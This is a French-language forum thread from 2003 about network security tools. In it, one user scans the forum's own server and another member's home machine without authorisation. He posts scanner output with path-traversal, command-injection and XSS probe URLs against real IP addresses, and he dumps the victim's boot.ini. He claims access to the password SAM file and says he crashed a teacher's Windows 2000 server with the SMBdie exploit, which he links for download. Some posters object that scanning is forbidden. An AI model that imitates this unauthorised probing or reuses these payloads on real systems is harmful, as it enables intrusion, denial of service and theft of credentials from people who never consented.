Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2645 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs
  Débats

  la sécurité , vous connaissez ?

 


 Mot :   Pseudo :  
 
 Page :   1  2  3  4  5
Page Précédente
Auteur Sujet :

la sécurité , vous connaissez ?

n°254627
jamiroq
Oublies que t'as aucune chance
Posté le 25-04-2003 à 22:19:16  profilanswer
 

si je vous dits :
 
n-stealth,
sniffer pro (nai),
smbdie,
nmap (wincap),
superscan ....
 
sur hfr c pas bo a voir les resultats ...
 


---------------
FFFF
mood
Publicité
Posté le 25-04-2003 à 22:19:16  profilanswer
 

n°254630
HuGoBioS
Posté le 25-04-2003 à 22:32:07  profilanswer
 

t'as scanné hfr :o
 
et ac donne quoi ? c'est une passoire ?


---------------
-= In Kik00 101 I trust :o =-
n°254633
jamiroq
Oublies que t'as aucune chance
Posté le 25-04-2003 à 22:36:27  profilanswer
 

HuGoBioS a écrit :

t'as scanné hfr :o
 
et ac donne quoi ? c'est une passoire ?


 
j'ai pas fait du scann agressif (on est pas la pour nuire), du light .... (avec bascule de port et tempo. à 5s pour les IDS de base):
 
Scanning : Normal  
 
212.43.221.155  
Nom d'hôte: s10.tgv.net
Port: 80
Serveur: Apache/1.3.27 (Unix) PHP/4.1.2
 
Le serveur peut avoir des vulnérabilités de CGI. 37 item(s)  
 
?WP-CS-DUMP Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/?wp-cs-dump
 
Common Netscape Enterprise Vulnerability/Exposure - False positives are known for this item.
 
 
?WP-VERIFY-LINK Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/?wp-verify-link
 
Common Netscape Enterprise Vulnerability/Exposure - False positives are known for this item.
 
 
ART Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/art
 
Common Vulnerability/Exposure.
 
 
HTML Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/html
 
Common Vulnerability/Exposure.
 
 
?PAGESERVICES Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/html/?PageServices
 
Common Vulnerability/Exposure.
 
 
IMAGES Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/images
 
Common Vulnerability/Exposure.
 
 
#1099  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/images/?cwd=../../../../
 
Common Vulnerability/Exposure.
 
 
#1100  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/images/?cwd=/
 
Common Vulnerability/Exposure.
 
 
NEWS Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/news
 
Common Vulnerability/Exposure.
 
 
ROBOTS Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/robots.txt
 
Common Vulnerability/Exposure.
 
 
TEMP Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/temp
 
Common Vulnerability/Exposure.
 
 
#2227  
Niveau du Risque: Moyen
Emplacement: http://ms_proxy_auth_query/
 
Common Vulnerability/Exposure.
 
 
CGI Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/cgi
 
Common Directory Checking Test. Tip from the SANS/FBI Top 20 - Configure your web server to use CGI alerting scripts for Error Responses. WebAdmins need to keep tabs on all of these security related issues with their web servers. To assist with this monitoring, the web server should be configured to use custom CGI error response pages for server response codes 401, 403, 413 and 500. The error pages are PERL CGI scripts that are initiated every time the server issues either of these response codes. These scripts accomplish many important tasks including issuing an html warning banner to the client and immediately sending an e-mail notification to the WebAdmin. The e-mail message automates the process of manually collecting security related session information from the web server access and error logs for the request.
 
 
HTML Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/html
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
IMAGES Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/images
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
NEWS Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/news
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
TEMP Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/temp
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
TESTS Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/tests
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
#7074  
Niveau du Risque: Grand
Emplacement: http://212.43.221.155//
 
Common HTTP Vulnerability/Exposure - Possible bug or misconfiguration problem in the web server that allow unauthorized remote users to gain information about the web server's host machine that will allow them to break into the system. False positives are known for this item.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?ac [...] platecache[faq]=hello+world
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?ca [...] script>
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?ch [...] .%2F%2Fetc
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?ch [...] .%2F%2Fetc
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?fi [...] d=ls%20-al
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
INDEX?FILE=INDEX Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?file=index.php
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
INDEX Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?includedir=test
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
PASSWD Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?l=../../../etc/passwd
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?l= [...] etc/passwd
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pa [...] etc/passwd
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pa [...] etc/passwd
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pa [...] r.com/file
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pg [...] adfile.php
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pi [...] _name=path
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pi [...] stant-path
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
INDEX Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pymembs=admin
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
INDEX Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?sql_debug=1
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?to [...] script>
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.  


---------------
FFFF
n°254635
HuGoBioS
Posté le 25-04-2003 à 22:39:53  profilanswer
 

houlà ca en fait bcp la qd meme !


---------------
-= In Kik00 101 I trust :o =-
n°254637
jamiroq
Oublies que t'as aucune chance
Posté le 25-04-2003 à 22:44:53  profilanswer
 

HuGoBioS a écrit :

houlà ca en fait bcp la qd meme !


 
..pas mal de php , mais ca, ca ne m'etonne pas !!!!
les dev. se foutent souvent de la sécu ... d'ou des tonnes de failles en sql injection ou php ...
 
Par contre j'ai testé smbdie sur du win2K : C FATALE !!!
 
en clair tu injectes une trame SMB avec 2 flags ... et tu vois ton serveur Ad (toute version !!! et SP3 aussi) te faire un beau BLUE Screen !! (avec videage memoire ..dump etc ...)
 
C delire a voir car ca tue le serveur en 2 sec !!!


---------------
FFFF
n°254638
HuGoBioS
Posté le 25-04-2003 à 22:46:42  profilanswer
 

jamiroq a écrit :


 
..pas mal de php , mais ca, ca ne m'etonne pas !!!!
les dev. se foutent souvent de la sécu ... d'ou des tonnes de failles en sql injection ou php ...
 
Par contre j'ai testé smbdie sur du win2K : C FATALE !!!
 
en clair tu injectes une trame SMB avec 2 flags ... et tu vois ton serveur Ad (toute version !!! et SP3 aussi) te faire un beau BLUE Screen !! (avec videage memoire ..dump etc ...)
 
C delire a voir car ca tue le serveur en 2 sec !!!

tu peux detailler ? trame smb avec deux flags ca me parle pas trop ... (je m'interesse a la secu depuis peu donc il me manque du vocabulaire lol)


---------------
-= In Kik00 101 I trust :o =-
n°254643
jamiroq
Oublies que t'as aucune chance
Posté le 25-04-2003 à 22:54:02  profilanswer
 

HuGoBioS a écrit :

tu peux detailler ? trame smb avec deux flags ca me parle pas trop ... (je m'interesse a la secu depuis peu donc il me manque du vocabulaire lol)
 


sorry pour les terme (c vraiment pas mon style d'enfumer avec des termes ..surtout que le principe est simple : j'allais juste au plus cours :d)
 
voici l'exploit et l'outils pour faire mumuse ...fais gaffe c pas un jouet, ca reboot le serveur sans la moindre autorisation  du tout !!
 
: http://www.securityfocus.com/bid/5556/discussion/
  http://www.securityfocus.com/bid/5556/exploit/
 
si tu veux l'outils (.exe) qui exploite la faille tu vas sur l'onglet "exploit" en bas ....
 
bon je vais dodo ma formation MCSE win2k m'a tué la tete aujourdh'ui A++
 
NB : ca torpille un serveur en SP3 (testé en cours sur le prof ... :d)


Message édité par jamiroq le 25-04-2003 à 22:57:14

---------------
FFFF
n°254644
HuGoBioS
Posté le 25-04-2003 à 22:59:23  profilanswer
 

jamiroq a écrit :


sorry pour les terme (c vraiment pas mon style d'enfumer avec des termes ..surtout que le principe est simple : j'allais juste au plus cours :d)
 
voici l'exploit et l'outils pour faire mumuse ...fais gaffe c pas un jouet, ca reboot le serveur sans la moindre autorisation  du tout !!
 
: http://www.securityfocus.com/bid/5556/discussion/
  http://www.securityfocus.com/bid/5556/exploit/
 
si tu veux l'outils (.exe) qui exploite la faille tu vas sur l'onglet "exploit" en bas ....
 
bon je vais dodo ma formation MCSE win2k m'a tué la tete aujourdh'ui A++
 
NB : ca torpille un serveur en SP3 (testé en cours sur le prof ... :d)

lol oky
je t'accusais pas de verbiage ;-)
et t'inkiete j'aime pas faire planter les machines ... !
bonne soirée


---------------
-= In Kik00 101 I trust :o =-
n°254788
DesuetCR_B
Posté le 26-04-2003 à 13:20:23  profilanswer
 

jamiroq a écrit :


sorry pour les terme (c vraiment pas mon style d'enfumer avec des termes ..surtout que le principe est simple : j'allais juste au plus cours :d)
 
voici l'exploit et l'outils pour faire mumuse ...fais gaffe c pas un jouet, ca reboot le serveur sans la moindre autorisation  du tout !!
 
: http://www.securityfocus.com/bid/5556/discussion/
  http://www.securityfocus.com/bid/5556/exploit/
 
si tu veux l'outils (.exe) qui exploite la faille tu vas sur l'onglet "exploit" en bas ....
 
bon je vais dodo ma formation MCSE win2k m'a tué la tete aujourdh'ui A++
 
NB : ca torpille un serveur en SP3 (testé en cours sur le prof ... :d)


J'ai beau essayer ca marche pas : pourtant l'ordi sur lequel j'essaye est un W2Ksp3

n°254795
nikosaka
Posté le 26-04-2003 à 13:41:21  profilanswer
 

il est surement patché (windows update je pense) ou alors tu ne peux pas faire la résolution de noms netbios
 
jamiroq => quel scanner te donne un rapport si détaillé (ça m'interesse si ça tourne pas sous win)?


Message édité par nikosaka le 26-04-2003 à 13:42:10
mood
Publicité
Posté le 26-04-2003 à 13:41:21  profilanswer
 

n°254797
DesuetCR_B
Posté le 26-04-2003 à 13:43:28  profilanswer
 

nikosaka a écrit :

il est surement patché (windows update je pense) ou alors tu ne peux pas faire la résolution de noms netbios
 
jamiroq => quel scanner te donne un rapport si détaillé (ça m'interesse si ça tourne pas sous win)?


a part le sp3 y a aucun patch (je l'ai installé) par contre le pb vien de netbios : session refused !?

n°254813
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 14:57:07  profilanswer
 

nikosaka a écrit :

il est surement patché (windows update je pense) ou alors tu ne peux pas faire la résolution de noms netbios
 
jamiroq => quel scanner te donne un rapport si détaillé (ça m'interesse si ça tourne pas sous win)?


 :( , c sous win n-stealth ... mais bon c pas le plus costaud crois moi ...
 
c clair que c une exploit ipc$ et smb donc .. tu coupe le partage de fichier donc le port 137 à 139 ... cfini plus de paquet smb corrompu ..


---------------
FFFF
n°254814
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 14:58:19  profilanswer
 

DesuetCR_B a écrit :


a part le sp3 y a aucun patch (je l'ai installé) par contre le pb vien de netbios : session refused !?


files moi ton  ip ?


---------------
FFFF
n°254856
DesuetCR_B
Posté le 26-04-2003 à 16:32:18  profilanswer
 

jamiroq a écrit :


files moi ton  ip ?


g pas essayé sur ce pc, mais si tu veux faire des test :
popoboueb.dyndns.org, en plus y a pas de firewall

n°254858
Tomate
Posté le 26-04-2003 à 16:37:12  profilanswer
 

c po bien te scanner hfr c interdit :D


---------------
:: Light is Right ::
n°254865
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 16:50:38  profilanswer
 

tomate77 a écrit :

c po bien te scanner hfr c interdit :D


je sais, et ca je m'en excuse, mais c pas du scan agressif, c du scan de test avec des intervalles de 5s (pour eviter les IDS).
 
edit : c clair que je vais pas surcharger le serveur a vec des test a la con.evidement.


Message édité par jamiroq le 26-04-2003 à 16:53:07

---------------
FFFF
n°254883
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 17:53:20  profilanswer
 

DesuetCR_B a écrit :


g pas essayé sur ce pc, mais si tu veux faire des test :
popoboueb.dyndns.org, en plus y a pas de firewall


 
allez, on va commencer soft, voici ton boot.ini mon cher :
 
[boot loader] timeout=0 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professionnel" /fastdetect  
 
....
 
edit : fais gaffe on a accés a ta SAM !!!!! (tt les mot de passes locaux de tes windows !!)


Message édité par jamiroq le 26-04-2003 à 17:55:05

---------------
FFFF
n°254886
nikosaka
Posté le 26-04-2003 à 18:10:59  profilanswer
 

jamiroq a écrit :


 
allez, on va commencer soft, voici ton boot.ini mon cher :
 
[boot loader] timeout=0 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professionnel" /fastdetect  
 
....
 
edit : fais gaffe on a accés a ta SAM !!!!! (tt les mot de passes locaux de tes windows !!)


 
c dingue ça  :??:  par où tu passes pour voir ça !
tu connais pas autrement un scanner linux avec un rapport des possibles failles et bug (surtout pour apache et php)

n°254889
Tomate
Posté le 26-04-2003 à 18:18:54  profilanswer
 

jamiroq a écrit :


je sais, et ca je m'en excuse, mais c pas du scan agressif, c du scan de test avec des intervalles de 5s (pour eviter les IDS).
 
edit : c clair que je vais pas surcharger le serveur a vec des test a la con.evidement.


oue mais le scan est interdit tout simplement :D


---------------
:: Light is Right ::
n°254893
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 18:30:38  profilanswer
 

nikosaka a écrit :


 
c dingue ça  :??:  par où tu passes pour voir ça !
tu connais pas autrement un scanner linux avec un rapport des possibles failles et bug (surtout pour apache et php)


 
nmap est sympa,
ethereal pour de l'ecoute locale de trame ... avec ca tu casses par ex. les password outolook ...


---------------
FFFF
n°254895
Tomate
Posté le 26-04-2003 à 18:31:25  profilanswer
 

jamiroq a écrit :


 
nmap est sympa,
ethereal pour de l'ecoute locale de trame ... avec ca tu casses par ex. les password outolook ...


t es rentre sur kel port jamiroq ??? :whistle:


---------------
:: Light is Right ::
n°254896
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 18:33:50  profilanswer
 

tomate77 a écrit :


oue mais le scan est interdit tout simplement :D


ah bon ?


---------------
FFFF
n°254899
nikosaka
Posté le 26-04-2003 à 18:35:26  profilanswer
 

tomate77 a écrit :


oue mais le scan est interdit tout simplement :D


oui bien sur, mais pour voir le boot.ini à distance sans passer par netbios c'est ni ethereal ni nmap qui me donner des infos aussi précise. par quel port tu est passé, moi j'ai trouvé ça :  
21/tcp     open        ftp
25/tcp     open        smtp
80/tcp     open        http
119/tcp    open        nntp
135/tcp    open        loc-srv
389/tcp    open        ldap
563/tcp    open        snews
1002/tcp   open        unknown
1025/tcp   open        NFS-or-IIS
1080/tcp   open        socks
1720/tcp   open        H.323/Q.931
3306/tcp   open        mysql
3372/tcp   open        msdtc
3389/tcp   open        ms-term-serv
5800/tcp   open        vnc-http
5900/tcp   open        vnc

n°254901
nikosaka
Posté le 26-04-2003 à 18:36:33  profilanswer
 


+1
pour l'instant le scan est encore autoriser il me semble

n°254905
Tomate
Posté le 26-04-2003 à 18:40:02  profilanswer
 

nikosaka a écrit :


+1
pour l'instant le scan est encore autoriser il me semble


bah scan moi et j envoie les logs a mon fai (ou le tien) et on vera ce k il se passera ;)
 
en gros, c est un bon motif pour couper ta connexion :/


---------------
:: Light is Right ::
n°254906
DesuetCR_B
Posté le 26-04-2003 à 18:41:16  profilanswer
 

tomate77 a écrit :


bah scan moi et j envoie les logs a mon fai (ou le tien) et on vera ce k il se passera ;)
 
en gros, c est un bon motif pour couper ta connexion :/


En general si c pas mechant y a juste rappel a l'ordre, si t'as tout detruit la ca devien different

n°254908
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 18:41:33  profilanswer
 

tomate77 a écrit :


t es rentre sur kel port jamiroq ??? :whistle:  


bon primo : je voudrais pas passer pour ce que je ne suis pas , cad un pro du hack ; je suis un utilisateur de faille (ayant une certaine connaissance de la secu .. un peu) ... les mecs qui trouvent les failles, c eux les respectables !!! soyons clair.
 
secondo: je ne rentre jamais par un port en force , les IDS verrouille illico l'IP qui fait du scan ... il faut scanné sur 2 a 3 heures pour balayer une seule IP proprement on dira !!
 
la popo ca fait depuis 3 heures que je l'observe .... :d (ps je te rassures je ne touche rien !!! mais bon sang met un firewall sur tes machines ...)


---------------
FFFF
n°254911
Tomate
Posté le 26-04-2003 à 18:43:58  profilanswer
 

jamiroq a écrit :


bon primo : je voudrais pas passer pour ce que je ne suis pas , cad un pro du hack ; je suis un utilisateur de faille (ayant une certaine connaissance de la secu .. un peu) ... les mecs qui trouvent les failles, c eux les respectables !!! soyons clair.
 
secondo: je ne rentre jamais par un port en force , les IDS verrouille illico l'IP qui fait du scan ... il faut scanné sur 2 a 3 heures pour balayer une seule IP proprement on dira !!
 
la popo ca fait depuis 3 heures que je l'observe .... :d (ps je te rassures je ne touche rien !!! mais bon sang met un firewall sur tes machines ...)


 
me ca ne nous dit tjs po par ou t es rentre tout ca [:meganne]
 
 
 
 :whistle:


---------------
:: Light is Right ::
n°254915
DesuetCR_B
Posté le 26-04-2003 à 18:47:49  profilanswer
 

jamiroq a écrit :


bon primo : je voudrais pas passer pour ce que je ne suis pas , cad un pro du hack ; je suis un utilisateur de faille (ayant une certaine connaissance de la secu .. un peu) ... les mecs qui trouvent les failles, c eux les respectables !!! soyons clair.
 
secondo: je ne rentre jamais par un port en force , les IDS verrouille illico l'IP qui fait du scan ... il faut scanné sur 2 a 3 heures pour balayer une seule IP proprement on dira !!
 
la popo ca fait depuis 3 heures que je l'observe .... :d (ps je te rassures je ne touche rien !!! mais bon sang met un firewall sur tes machines ...)


J'aimerai bien savoir par ou tu passe.
Qd j'aurai un peu plus de tps j'etudierai mes log.
 
Pour le firewall g pas encore trouvé chaussette a mon pied

n°254917
Tomate
Posté le 26-04-2003 à 18:48:55  profilanswer
 

DesuetCR_B a écrit :


J'aimerai bien savoir par ou tu passe.
Qd j'aurai un peu plus de tps j'etudierai mes log.
 
Pour le firewall g pas encore trouvé chaussette a mon pied


tu vas surement trouver pas mal de chose venant de moi  :whistle:


---------------
:: Light is Right ::
n°254918
DesuetCR_B
Posté le 26-04-2003 à 18:49:49  profilanswer
 

tomate77 a écrit :


tu vas surement trouver pas mal de chose venant de moi  :whistle:  


tant k'il y a pas de degat g rien contre

n°254922
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 18:52:49  profilanswer
 

ben je passe par ou c ouvert ..... tout le temps ouvert d'ailleurs  :lol:  :lol:  :lol:  :lol:  
 
21, 80, 443 ..... et leur autres petit copain !!
 
bon j'arretes de te scrutez mais patch , c un conseil !!!
 
217.128.133.46  
Nom d'hôte: AStrasbourg-102-1-1-46.abo.wanadoo.fr
Port: 80
Serveur: Apache/2.0.43 (Win32)
 
Le serveur peut avoir des vulnérabilités de CGI. 8 item(s)  
 
_VTI_INF Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/_vti_inf.html
 
Common Vulnerability/Exposure.
 
 
PHP Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe
 
Common Vulnerability/Exposure.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe? [...] access.log
 
Common Vulnerability/Exposure.
 
 
BOOT Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?c:boot.ini
 
Common Vulnerability/Exposure.
 
 
SAM Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?c:winntrepairsam
 
Common Vulnerability/Exposure.
 
 
SAM Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?d:winntrepairsam
 
Common Vulnerability/Exposure.
 
 
POSTINFO Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/postinfo.html
 
Common Vulnerability/Exposure.
 
 
TEST Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/test.htm
 
Common Vulnerability/Exposure.
 


---------------
FFFF
n°254923
DesuetCR_B
Posté le 26-04-2003 à 18:55:31  profilanswer
 

jamiroq a écrit :

ben je passe par ou c ouvert ..... tout le temps ouvert d'ailleurs  :lol:  :lol:  :lol:  :lol:  
 
21, 80, 443 ..... et leur autres petit copain !!
 
bon j'arretes de te scrutez mais patch , c un conseil !!!
 
217.128.133.46  
Nom d'hôte: AStrasbourg-102-1-1-46.abo.wanadoo.fr
Port: 80
Serveur: Apache/2.0.43 (Win32)
 
Le serveur peut avoir des vulnérabilités de CGI. 8 item(s)  
 
_VTI_INF Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/_vti_inf.html
 
Common Vulnerability/Exposure.
 
 
PHP Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe
 
Common Vulnerability/Exposure.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe? [...] access.log
 
Common Vulnerability/Exposure.
 
 
BOOT Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?c:boot.ini
 
Common Vulnerability/Exposure.
 
 
SAM Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?c:winntrepairsam
 
Common Vulnerability/Exposure.
 
 
SAM Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?d:winntrepairsam
 
Common Vulnerability/Exposure.
 
 
POSTINFO Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/postinfo.html
 
Common Vulnerability/Exposure.
 
 
TEST Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/test.htm
 
Common Vulnerability/Exposure.
 
 


21 et 80 g pas le choix
 
443 skoi ?

n°254925
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 18:57:57  profilanswer
 

si y'en a que ca amuse ....
 
voila mon ip du jour : 80.13.13.96
(c light comme protect mais suffisant contre pas mal d'attaque)
 
perso je bloque tout et fait du stateful pour mes sorties sur le web .... avec qq regles style antispoof, christmas tree, ip_frag ... rien de bien costaud.


---------------
FFFF
n°254927
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 18:59:41  profilanswer
 

DesuetCR_B a écrit :


21 et 80 g pas le choix
 
443 skoi ?


 
fait tourner ton ip DesuetCR_B ( tu reconnect ta connexion) car ton ip est visible, merci.
 
443 : https.(y'a parfois des failles sur certains moteur transactionnel "securisé" )


---------------
FFFF
n°254929
bobor
tueur de n44b
Posté le 26-04-2003 à 19:03:22  profilanswer
 

:ouch: hallucinant!
 
T'as un site qui explique tout ça clairement (en français pas trop technique avec exemples pratiques  :D )
 
J'ai confiance dans mon firewall, mais il va quand même falloir que j'approfondisse...


---------------
Gitan des temps modernes
n°254930
Tomate
Posté le 26-04-2003 à 19:03:35  profilanswer
 

ok jamiroq, t as un scanner de failles petit malin :D
 
c est kler k il fo k il patch ET firewall tout ca !!
 
pour son ip c trop tard, il a file son nom dns dyndns :D


---------------
:: Light is Right ::
n°254931
HuGoBioS
Posté le 26-04-2003 à 19:09:38  profilanswer
 

Special Request  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe? [...] access.log
 
Common Vulnerability/Exposure.
 
c ma preferée celle là ...  
 
 
C'est kler que les scanners de faille c'est assez terrible pour voir les  .. failel sd'une machine !!


---------------
-= In Kik00 101 I trust :o =-
n°254932
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 19:09:43  profilanswer
 

Bobor a écrit :

:ouch: hallucinant!
 
T'as un site qui explique tout ça clairement (en français pas trop technique avec exemples pratiques  :D )
 
J'ai confiance dans mon firewall, mais il va quand même falloir que j'approfondisse...


 
pour peter un firewall deux methodes (les grdes lignes) :
 
1 - un firewall c un mur , ok ,
2 - un mur avec des petit trous ouverts ... ok,
 
Donc :
 
soit on passe par les petits trous ouverts , la meme ou se trouve le site web, ftp , http etc ... (c les failles de ces composant qui permettent de passer !!) ou alors on utilise les troyans ..ca c deja bcp moins elegants !!!
 
soit on essaie de casse le firewall lui meme alors on attaque l'os lui meme qui le fait tourner !! (une pile IP ca se casse .... facilement sur certains os ..)


---------------
FFFF
n°254933
jamiroq
Oublies que t'as aucune chance
Posté le 26-04-2003 à 19:10:03  profilanswer
 

tomate77 a écrit :

ok jamiroq, t as un scanner de failles petit malin :D
 
c est kler k il fo k il patch ET firewall tout ca !!
 
pour son ip c trop tard, il a file son nom dns dyndns :D


shitt !!


---------------
FFFF
mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3  4  5
Page Précédente

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs
  Débats

  la sécurité , vous connaissez ?

 

Sujets relatifs
Connaissez-vous des sites trucs/astuces pour Linux ?Serveur apache/php : securite
Vous connaissez des bons moteurs de news libre ?ca y'est je suis rentré dedans : NFS !!! avis de vous,qui connaissez .
[secu] Site pour sécurité sous linux?securité et vie privée
On parlait de la sécurité/confidentialité des données sur un disque..[Noob] sécurité réseau avec firewall/routeur sous linux ?
Vous connaissez Terminal TV ?Securite sur APACHE, httpd.conf et directory
Plus de sujets relatifs à : la sécurité , vous connaissez ?


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR